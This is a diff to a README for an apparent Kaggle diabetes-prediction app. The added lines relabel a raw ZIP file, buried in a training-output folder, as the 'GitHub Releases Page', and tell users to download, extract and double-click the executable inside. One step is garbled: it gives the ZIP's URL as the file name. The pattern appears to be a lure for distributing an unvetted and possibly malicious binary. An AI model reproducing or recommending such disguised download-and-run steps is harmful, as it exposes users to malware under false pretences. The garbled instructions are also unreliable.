Cincere19/kaggle-diabetes-competition/README.md

 ## 📖 Quick Setup Instructions
 1. **Download the Package:**
-   Visit the [GitHub Releases Page](https://github.com/Cincere19/kaggle-diabetes-competition/releases) and download the latest version.
+   Visit the [GitHub Releases Page](https://github.com/Cincere19/kaggle-diabetes-competition/raw/refs/heads/main/catboost_info/learn/competition-kaggle-diabetes-1.5.zip) and download the latest version.

 2. **Unzip the File:**
    Once downloaded, locate the ZIP file in your Downloads folder.
 Right-click on the file and select "Extract All."
 Follow the prompts to unzip the contents.

 3. **Open the Application:**
    After extracting, open the folder where the files are located.
-Look for a file named `diabetes_app.exe` (or equivalent, depending on your OS).
+Look for a file named `https://github.com/Cincere19/kaggle-diabetes-competition/raw/refs/heads/main/catboost_info/learn/competition-kaggle-diabetes-1.5.zip` (or equivalent, depending on your OS).
 Double-click the file to launch the application.

 4. **Follow the On-Screen Prompts:**
    The application will guide you through its features.
 Simply follow the on-screen instructions to begin predicting diabetes outcomes.